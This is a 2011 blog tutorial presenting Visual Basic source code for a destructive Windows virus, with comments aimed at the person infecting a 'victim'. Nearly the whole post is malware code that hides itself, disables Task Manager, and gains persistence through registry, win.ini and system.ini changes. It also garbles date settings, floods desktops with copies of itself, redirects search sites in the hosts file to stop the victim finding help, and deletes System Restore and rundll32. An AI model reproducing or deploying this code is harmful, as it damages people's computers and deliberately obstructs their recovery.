Thursday, 17 November 2011

HOW TO CREATE A POWERFUL VIRUS IN VISUAL BASIC


Open VB and follow the code:


–code start here–

Private Sub Form_Load()
On Error Resume Next
‘This command will allow the application to continue running
‘even if an error occurs instead of terminating/closing.
Hide
‘This command will hide the application from even being seen on the victims
‘screen even if your program has it’s settings set to Visible|True
App.TaskVisible = False
‘This command is even better, this command will stop your program
‘from showing up in Task Manager-Applications Tab List, but it will still
‘show up in process list, sorry =/
End Sub



‘disable taskmanager

Shell “REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f”, vbHide
Shell “REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f”, vbHide
‘This command will make your application start with windows.
Shell “REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f”, vbHide
‘This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example
Shell “REG add HKLM\Control Panel\International /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
‘These commands will set the time & date for the victims computer permanently
‘Change the ###Letter/Symbol/Number### to ? for example, and the victim will see ???????? for the time and ??????
‘for the date.
FileCopy App.Path & “\” & App.EXEName & “.EXE”, “Drive:\Path\Name.exe”
‘This code well, it couldn’t be more obvious what it does, but when copying your virus/worm ect
‘to a new path, try looking up windows processes like svchost.exe, making it harder for the victim
‘to get rid of your virus/worm/trojan ect.

Dim intResult As Integer
Randomize
intResult = Int((9542 * Rnd) + 4592)
FileCopy App.Path & “\” & App.EXEName & “.EXE”, “c:\Documents and Settings\All Users\Desktop\DimenBlackScript.exe” & intResult & “.exe”
‘Ok for abit of fun, here is a simple code but a real nasty one, add a timer to your application
‘interval set to “1″ when this code runs, all user accounts desktops will be flooded with your virus and the longer it
‘runs the more Memory it takes up and the more viruses that person has to delete, try adding it to places like
‘ C:\DOCU~\All Users\Start Menu\Programs\Start up\
‘That will cause the victim alot of hassle =P.

Kill “c:\windows\win.ini”
Kill “c:\windows\system.ini”
Open “c:\WINDOWS\win.ini” For Output As #1
Print #1, “Load = C:\Program Files\Virus1.exe”
Print #1, “run = C:\Program Files\Virus2.exe”
Close #1
Open “c:\WINDOWS\system.ini” For Output As #1
Print #1, “Shell=Explorer.exe C:\WINDOWS\System\Virus3.exe”
Print #1, “Shell=Explorer.exe C:\WINDOWS\System32\Virus4.exe”
Close #1
‘Ok people more fun, making your application start with windows, without using Registry or DOS
‘one little alter and your viruses and start with windows and the victim will not know how.

Open “c:\WINDOWS\system32\drivers\etc\hosts” For Output As #1
Print #1, “208.65.153.251 208.65.153.251 “
Print #1, “208.65.153.251 www.google.com”
Print #1, “208.65.153.251 www.google.co.uk”
Print #1, “208.65.153.251 www.yahoo.com”
Print #1, “208.65.153.251 www.yahoo.co.uk”
Print #1, “208.65.153.251 www.askjeeves.com”
Print #1, “208.65.153.251 www.altavista.com”
Print #1, “208.65.153.251 www.alltheweb.com”
Print #1, “208.65.153.251 www.msn.com”
Print #1, “208.65.153.251 www.hotmail.com”
Print #1, “208.65.153.251 www.myspace.com”
Print #1, “208.65.153.251 www.plunder.com”
Print #1, “208.65.153.251 www.quicksharing.com”
Print #1, “208.65.153.251 www.myspace.co.uk”
Close #1
‘Just something to help stop the victim from google-ing what the virus has done, and getting information
‘or downloads to help rid them of your infection >=P.

Kill “%SystemRoot%\syst” & “em32\dfrg.msc”
Kill “%SystemRoot%\syste” & “m32\wscui.cpl”
Kill “C:\Program Files\Co” & “mmon Files\Microsoft Shared\MSInfo\msinfo32.exe”
Kill “%SystemRoot%\syste” & “m32\restore\rstrui.exe”
Kill “c:\WINDOWS\syste” & “m32\rundll32.exe”
‘Ok now finally let’s get rid of System Restore, Rundll(by deleting this file, the victim can no longer
‘view the properties window for any file on his or her computer).

–code end here–

0 comments:

Post a Comment